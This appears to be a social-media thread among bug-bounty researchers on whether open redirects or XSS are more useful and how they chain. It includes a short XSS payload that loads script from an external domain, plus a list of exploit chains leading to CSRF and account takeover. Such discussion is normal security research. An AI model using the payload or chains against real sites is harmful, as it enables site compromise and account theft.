xssdoctor (@xssdoctor)

Raphael Silva, Justin Gardner, hakluke: Of course you’re right, XSS can be much more easily weaponized. But I would argue that XSS without further escalation is only useful for phishing, and open redirect would do a similar job.

Raphael Silva (@0x_rcss)

Justin Gardner, xssdoctor, hakluke: Apart from phishing and being part of an exploit chain, what other uses do you usually see? Genuinely asking, I feel like I could do more with these and they are everywhere.

Raphael Silva (@0x_rcss)

xssdoctor, Justin Gardner, hakluke: I'd say that's pretty reductive of XSS, the ceiling is much higher there a lot of the time unless you're severely restricted in some way.

Raphael Silva (@0x_rcss)

Arham Khan: Something like <script src='//15.rs' ?

That's about 21 characters, so you still have space in there for a slightly bigger domain if you need. You don't need the scheme nor the last '>' most of the time.

Justin Gardner (@Rhynorater)

Raphael Silva, xssdoctor, hakluke: Yeah, I mean 'being a part of an exploit chain' is SUPER broad, so putting that aside there isn't anything, but as for chains:
* OR => XSS (if it is client-side OR and JS scheme is available)
* OR + CSPT => XSS or CSRF
* SSRF + OR => Bypassed Host Restrictions
* OAuth + OR => ATO
